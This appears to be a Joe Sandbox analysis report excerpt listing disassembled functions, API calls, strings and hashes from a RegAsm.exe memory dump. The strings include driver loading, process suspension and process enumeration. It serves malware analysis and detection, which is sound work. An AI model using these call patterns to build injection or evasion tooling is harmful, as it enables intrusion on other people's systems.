                                                                                                                                                                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                      • API String ID: 4139908857-2887671607
                                                                                                                                                                      • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                      • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                      • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                      • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                        • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                      • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                      • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                      • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                      • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                      • String ID: 4$h
                                                                                                                                                                      • API String ID: 4019544885-1856150674
                                                                                                                                                                      • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                      • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                      • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                      • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                      • String ID: 0$6
                                                                                                                                                                      • API String ID: 4066108131-3849865405
                                                                                                                                                                      • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                      • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                      • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                      • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 004082EF
                                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                      • memset.MSVCRT ref: 00408362
                                                                                                                                                                      • memset.MSVCRT ref: 00408377
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset$ByteCharMultiWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 290601579-0
                                                                                                                                                                      • Opcode ID: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                                                                                                      • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                      • Opcode Fuzzy Hash: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                                                                                                      • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: free$wcslen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3592753638-3916222277
                                                                                                                                                                      • Opcode ID: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                                                                                                                                                                      • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                      • Opcode Fuzzy Hash: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                                                                                                                                                                      • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 0040A47B
                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                      • String ID: %s (%s)$YV@
                                                                                                                                                                      • API String ID: 3979103747-598926743
                                                                                                                                                                      • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                      • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                      • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                      • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                      • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                      • API String ID: 2767993716-572158859
                                                                                                                                                                      • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                      • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                      • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                      • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                        • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                      • API String ID: 3176057301-2039793938
                                                                                                                                                                      • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                      • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                      • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                      • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                      • database is already attached, xrefs: 0042F721
                                                                                                                                                                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                      • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                      • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                      • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                      • out of memory, xrefs: 0042F865
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                      • API String ID: 1297977491-2001300268
                                                                                                                                                                      • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                                                      • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                      • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                                                      • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                                                                                                      • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                                                                                                      • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                      • String ID: ($d
                                                                                                                                                                      • API String ID: 1140211610-1915259565
                                                                                                                                                                      • Opcode ID: 0069feb4b1de97920c5300279c07769cea3f871f2420f4ec65c64da01ae34e30
                                                                                                                                                                      • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                                      • Opcode Fuzzy Hash: 0069feb4b1de97920c5300279c07769cea3f871f2420f4ec65c64da01ae34e30
                                                                                                                                                                      • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                                      APIs
                                                                                                                                                                      • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                      • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3015003838-0
                                                                                                                                                                      • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                      • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                                      • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                      • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                                      APIs
                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                                      • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                      • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                      • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                      • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00413C4E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                      • String ID: 3A
                                                                                                                                                                      • API String ID: 3300951397-293699754
                                                                                                                                                                      • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                      • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                      • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                      • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                      • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                      • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                      • String ID: strings
                                                                                                                                                                      • API String ID: 3166385802-3030018805
                                                                                                                                                                      • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                      • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                      • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                      • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                      • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                      • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                      • String ID: AE$.cfg$General$EA
                                                                                                                                                                      • API String ID: 776488737-1622828088
                                                                                                                                                                      • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                      • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                      • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                      • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                      • memset.MSVCRT ref: 0040D906
                                                                                                                                                                      • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                        • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                        • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                      • String ID: sysdatetimepick32
                                                                                                                                                                      • API String ID: 1028950076-4169760276
                                                                                                                                                                      • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                      • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                      • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                      • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$FreeLoadMessage
                                                                                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                      • API String ID: 3897320386-317687271
                                                                                                                                                                      • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                      • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                      • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                      • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                      • API String ID: 4271163124-70141382
                                                                                                                                                                      • Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                                                                                                                      • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                      • Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                                                                                                                      • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                      • API String ID: 4139908857-3953557276
                                                                                                                                                                      • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                      • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                      • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
